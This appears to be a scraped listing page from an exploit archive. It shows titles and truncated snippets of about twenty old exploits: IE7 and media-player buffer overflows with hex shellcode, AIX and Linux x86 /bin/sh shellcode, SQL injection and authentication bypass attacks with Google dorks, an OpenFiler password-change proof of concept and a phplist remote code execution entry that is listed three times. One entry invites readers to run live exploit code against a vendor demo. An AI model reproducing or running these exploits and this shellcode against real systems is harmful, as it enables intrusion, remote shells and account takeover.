Microsoft Internet Explorer 7 (Windows XP SP2) - Memory Corruption (MS09-002)

// Skyland win32 bindshell 28876/tcp shellcode // If you want an evill Shellcode go ahead !!! var...

Aix - execve /bin/sh - 88 bytes

No description provided by source. / Aix execve of /bin/sh Georgi Guninski [email protected] / unsigned int code= 0x7c0802a6 , 0x9421fbb0 , 0x90010458 , 0x3c60f019 , 0x60632c48 , 0x90610440 , 0x3c60d002 , 0x60634c0c , 0x90610444 , 0x3c602f62 , 0x6063696e , 0x90610438 , 0x3c602f73 , 0x60636801 ...

Graugon Gallery 1.0 - Cross-Site Scripting / SQL Injection / Cookie Bypass

0x01 Informations: Name : Graugon Gallery 1.0 Download : http://www.hotscripts.com/jump.php?listingid=87617&jumptype=1 Vulnerability : Sql Injection/ Insecure Cookie Handling/XSS Author : x0r Contact : [email protected] Notes : Proud to be Italian 0x02 Bug: Bugged file is /path/admin.php Code...

Euphonics Audio Player 1.0 XP/SP3 Exploit

include include include define overflow 1324 define NOP 0x90 define pls "Eye.pls" int main int argc,char argv char winsp3 = "\x7B\x46\x86\x7C"; char bufferoverflow; FILE Player; unsigned char shellcode = "\x31\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xec"...

Phormer PhotoGallery 3.3.1 Insecure Cookie

Exploit Code : Phormer PhotoGallery 3.3.1 Insecure Cookie Handling Vulnerability Author: Hussin X Home : www.IQ-TY.com & www.TrYaG.cc Mail : [email protected] script : http://p.horm.org/er DorK:"This PhotoGallery is powered by Phormer" exploiT: go to admin page www.site.com/admin.php exploiT...

OpenFiler 2.3 - (Authentication Bypass) Remote Password Change

Exploit code PoC for OpenFiler 2.3 current by just a nonroot user http://nonroot.blogspot.com/ import urllib,sys,re host example: https://192.168.20.5:446/ host=rawinput"OpenFiler system include http and /: " Super admin user user='openfiler' What pass do you want? password='nonroot' use it pleas...

phplist 2.10.x (RCE by environ inclusion) Local File Inclusion Exploit

No description provided by source. phplist 2.10.x remote code execution Credit:AmnPardaz Security Research Team for the vuln exploit author [email protected] Poc root@server pentest perl phplistrce.pl http://www.helpcenter.it/list/ phplist 2.10.x 0day RCE may b others by mozi: uname -a 686 i686...

ManageEngine Firewall Analyzer 5 - Cross-Site Request Forgery / Cross-Site Scripting

Written By Michael Brooks Special thanks to str0ke! Product: ManageEngine Firewall Analyzer 5 - XSRF and XSS Vulerable version: Build Version : 5.0.0 Build Number : 5000 Build Date : Apr25 homepage: http://fwanalyzer.com/ This is live exploit code against the online demo. Go ahead, run it! With...

PHP-List Remote Code Execution

phplist 2.10.x remote code execution Credit:AmnPardaz Security Research Team for the vuln exploit author [email protected] Poc root@server pentest perl phplistrce.pl http://www.helpcenter.it/list/ phplist 2.10.x 0day RCE may b others by mozi: uname -a 686 i686 i386 GNU/Linux mozi: w 04:43:41 up...

phpList 2.10.x - Remote Code Execution / Local File Inclusion

phplist 2.10.x remote code execution Credit:AmnPardaz Security Research Team for the vuln exploit author [email protected] Poc root@server pentest perl phplistrce.pl http://www.helpcenter.it/list/ phplist 2.10.x 0day RCE may b others by mozi: uname -a 686 i686 i386 GNU/Linux mozi: w 04:43:41 up...

Sad Raven's Click Counter 1.0 - 'passwd.dat' File Disclosure

!/usr/bin/python Portal Name: Sad Raven's Click Counter version : 1.0 'Google Dork : Sad Raven's Click Counter v1.0 Exploit Coded by: PouyaServer Exploit Discovered by: PouyaServer Contact Me : [email protected] import urllib import sys import parser serv="http://" i=0 for arg in sys.argv:...

VUPlayer 2.49 - '.asx' 'HREF' Universal Buffer Overflow

usage: exploit.py print "" print " VUPlayer 2.49 .ASX File HREF Universal Buffer Overflow\n" print " Founder: aBo MoHaMeD" print " exploit code: His0k4" print " Tested on: Windows XP Pro SP2 Fr\n" print " Greetings to:" print " All friends & muslims HaCkersdz\n" print "" header1 =...

VUPlayer 2.49 - .asx HREF Universal Buffer Overflow

VUPlayer 2.49 - .asx HREF Universal Buffer Overflow usage: exploit.py print "" print " VUPlayer 2.49 .ASX File HREF Universal Buffer Overflow\n" print " Founder: aBo MoHaMeD" print " exploit code: His0k4" print " Tested on: Windows XP Pro SP2 Fr\n" print " Greetings to:" print " All friends &...

BulletProof FTP Client (.bps File) Local Stack Overflow PoC

Exploit for unknown platform in category dos / poc =========================================================== BulletProof FTP Client .bps File Local Stack Overflow PoC =========================================================== !/usr/bin/perl Bug : BulletProof FTP Client .bps Local Stack Overflo...

Cain Abel 4.9.23 - .rdp Local Buffer Overflow

Cain Abel 4.9.23 - .rdp Local Buffer Overflow exploit.py print "" print " !R4Q!4N H4CK3R" print "Cain & Abel 4.9.23 rdp file Buffer overflow Exploit" print "By:Encrypt3d.M!nd" print "encrypt3d.blogspot.com" print "" print "Greetz:-=Mizo=-,L!0N,El Mariachi,MiNi SpIder..and all my friends" print...

Active Test 2.1 (Auth Bypass) Remote SQL Injection Vulnerability

No description provided by source. ----------------------------بسم الله الرحمن الرحيم------------------------------ Tybe:Auth Bypass Remote SQL Injection Vulnerability Vendor: www.activewebsoftwares.com Software: Active Test v 2.1 author: я3d D3v!L Date: 28.11.2008 Home: www.ahacker.biz contact:...

SailPlanner 0.3a (Auth Bypass) SQL Injection Vulnerability

Exploit for unknown platform in category web applications ========================================================== SailPlanner 0.3a Auth Bypass SQL Injection Vulnerability ==========================================================...

ethiclinks-sql.txt

----------------------------------------------------------------------------------------------------------------------------------------------------- Ethiclinks link.php?catid linkdirectory.php?catid directory-links.php?catid Remote SQL Injection Vulnerability http://www.ethiclinks.com/...

linksautomation-sql.txt

----------------------------------------------------------------------------------------------------------------------------------------------------- LinksAutomation Script links.php?catid and LinksAutomation.php?catid Remote SQL Injection Vulnerability http://www.linksautomation.com...

linux/x86 setuid(0) & execve(/bin/sh 0 0) shellcode 28 bytes

No description provided by source. -------------------ASM---------------------- global start section .text start: ;setuid0 xor ebx,ebx lea eax,ebx+17h cdq int 80h ;execve"/bin/sh",0,0 xor ecx,ecx push ecx push 0x68732f6e push 0x69622f2f lea eax,ecx+0Bh mov ebx,esp int 80h...